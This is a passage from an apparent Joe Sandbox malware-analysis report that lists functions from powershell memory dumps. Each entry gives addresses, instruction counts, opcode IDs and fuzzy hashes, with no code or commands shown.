                                                                                                                            • Instruction Fuzzy Hash: DF01FB75E0464A8FC780DF68D58599EBBF0FF09320F504299E509EB722D7319A94CB90
                                                                                                                            Function 00D86E68 Relevance: .0, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 54c9898e04e1b2e5f558a2edd834b96936127415c52f27f2fe6fb84c69d7726a
                                                                                                                            • Instruction ID: dc7bb08525973426e7bbd107259db97e5f21215269b67a014f8a9b491d43e593
                                                                                                                            • Opcode Fuzzy Hash: 54c9898e04e1b2e5f558a2edd834b96936127415c52f27f2fe6fb84c69d7726a
                                                                                                                            • Instruction Fuzzy Hash: C2F0A974E0420A8FC780DF68C485AAEBBF0FF49310F5041A9E509DB321D730E955CB91
                                                                                                                            Function 00D87555 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f400f6cbd6ce7e1051cf2fb12c52fe3cf19df6e285cd3b5a5c10adf01e5f55dd
                                                                                                                            • Instruction ID: 02cf5225efb1825d7089f705dc8efb496249f72a6a116d2e9f0a3ee4c670c8c5
                                                                                                                            • Opcode Fuzzy Hash: f400f6cbd6ce7e1051cf2fb12c52fe3cf19df6e285cd3b5a5c10adf01e5f55dd
                                                                                                                            • Instruction Fuzzy Hash: 66F037706403068FDB04DBA4C556B6E77B1DB40344F104554D1019F3A9CB78DD498B90

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00D8B928 Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1788692757.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_d80000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d2162d8d39cd10edf103e596a52a24cefd3bb4cb3ce2ff2c4f274cd8414e9840
                                                                                                                            • Instruction ID: 2d842fbdedc8071ef4cedd010d08250d7d66864c2597dac1c0f40339e6470f6b
                                                                                                                            • Opcode Fuzzy Hash: d2162d8d39cd10edf103e596a52a24cefd3bb4cb3ce2ff2c4f274cd8414e9840
                                                                                                                            • Instruction Fuzzy Hash: 57F0139144E7E22FD743AB7889A11C63F70AC532A43AA40D3C0E1CF4A3D508884EC7B6
                                                                                                                            Function 072B1418 Relevance: 10.3, Strings: 8, Instructions: 328COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-3865595929
                                                                                                                            • Opcode ID: 07f1b2c1deb284576e22a749fead4cfd941aba79c84fdc951e8b40f5c97f613b
                                                                                                                            • Instruction ID: 0b3557864b36710a63bad0e2a536c5189f58801f3237b0923628b22e757b2ad7
                                                                                                                            • Opcode Fuzzy Hash: 07f1b2c1deb284576e22a749fead4cfd941aba79c84fdc951e8b40f5c97f613b
                                                                                                                            • Instruction Fuzzy Hash: D4A17AB2B2430A9FC7345B799820AA6BBF6AFC6750F1880ABD505CB351DA31CC55C761
                                                                                                                            Function 072B0518 Relevance: 9.1, Strings: 7, Instructions: 324COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-1608119003
                                                                                                                            • Opcode ID: 73dcd4644301c3147a79f32277b75e349b50b1c831fd2968c9e75b4ceb320833
                                                                                                                            • Instruction ID: d600bacfd81a519036f12af1f0d8bbd70a96d248cb25dc4faf9f456ef6ae1785
                                                                                                                            • Opcode Fuzzy Hash: 73dcd4644301c3147a79f32277b75e349b50b1c831fd2968c9e75b4ceb320833
                                                                                                                            • Instruction Fuzzy Hash: DEA168B1B243568FC7364A7988006BBBBE5AFC6390F1884AFD545CB361DA31DC45CBA1
                                                                                                                            Function 072B4298 Relevance: 7.6, Strings: 6, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$J"l
                                                                                                                            • API String ID: 0-2021144975
                                                                                                                            • Opcode ID: eb747a9999c954342699fd5d141de4eafa632f4613a9dd6e8062209ac11378be
                                                                                                                            • Instruction ID: 6c71d8ff76ecb667f4e3b28e80ab394f6be0805eb4e9a03aa88c0ae75be4907f
                                                                                                                            • Opcode Fuzzy Hash: eb747a9999c954342699fd5d141de4eafa632f4613a9dd6e8062209ac11378be
                                                                                                                            • Instruction Fuzzy Hash: 20415C707142879FC734AA2984509A67BA2AFC2790B2C84ABD445CF363DF35CC4DC362
                                                                                                                            Function 072B1168 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-3272787073
                                                                                                                            • Opcode ID: 535d16e24b1fa8c642ede9196e4578285ff61c3c514fc859d336f5a82c59c124
                                                                                                                            • Instruction ID: 22464ac61c2cec383fd3637e2155d71ef57c84cc8b05a41861839253b8a09e3f
                                                                                                                            • Opcode Fuzzy Hash: 535d16e24b1fa8c642ede9196e4578285ff61c3c514fc859d336f5a82c59c124
                                                                                                                            • Instruction Fuzzy Hash: 46516BB172431FCFCB345A6998207EBBBE6AFC2790F14806BD445CB651DA31C8A5C7A1
                                                                                                                            Function 072B32A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-2125118731
                                                                                                                            • Opcode ID: 6a767f0e509b7415541907c69ee727dc96527503dc748081c7c81f2abe2b5a8c
                                                                                                                            • Instruction ID: d349369935283fee533e8bc4aed571eab8c83674485d5530e68ef3b36efb3b53
                                                                                                                            • Opcode Fuzzy Hash: 6a767f0e509b7415541907c69ee727dc96527503dc748081c7c81f2abe2b5a8c
                                                                                                                            • Instruction Fuzzy Hash: A9218BB173420B6BD734992A8C01B77B6D6DBC0754F24842AA505CF382CD76D849C3A1
                                                                                                                            Function 072B0309 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.1807920155.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_72b0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                            • API String ID: 0-2049395529
                                                                                                                            • Opcode ID: cb47c352254c5275bf1c3b35ced7b97dbde69956bae90be536d2ae4586b94659
                                                                                                                            • Instruction ID: 215967ebdcf0b368e55c57c5ae0354569d905aa4e4ba82ae1c01ddd7ad5103a2
                                                                                                                            • Opcode Fuzzy Hash: cb47c352254c5275bf1c3b35ced7b97dbde69956bae90be536d2ae4586b94659
                                                                                                                            • Instruction Fuzzy Hash: 1B01DF61A1E38A4FC73B123818281966FB65FC3A9072A40EBC440DF39BCD248C4D83A7

                                                                                                                            Executed Functions

                                                                                                                            Function 00AFD006 Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.2011549736.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_afd000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 961978d9501b9a5f86b2d46ff781fe6f0ec7a0185a63b04e5e33b67b98a63458
                                                                                                                            • Instruction ID: f85935fdece94b9219fe24993842ff3bb31d1dea2901fdd4764b9c53d44e67bd
                                                                                                                            • Opcode Fuzzy Hash: 961978d9501b9a5f86b2d46ff781fe6f0ec7a0185a63b04e5e33b67b98a63458
                                                                                                                            • Instruction Fuzzy Hash: 23014C6100E3C49ED7138B258894B62BFB4EF53224F1DC0DBE9888F1A3C6699849C772
                                                                                                                            Function 00AFD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.2011549736.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_afd000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d0112b09a1b284929af3b12055dec3cf80095426f8e64b97827db0bac4970fc7
                                                                                                                            • Instruction ID: bd6da9d69961b0cfda6988f872db09f1ce0b40b6dde09485327d4a2de9dddf6d
                                                                                                                            • Opcode Fuzzy Hash: d0112b09a1b284929af3b12055dec3cf80095426f8e64b97827db0bac4970fc7
                                                                                                                            • Instruction Fuzzy Hash: B001F7710083089AE7124F65C984777BFA8DF41324F18C52AFE0A4B146CA79D841C6B1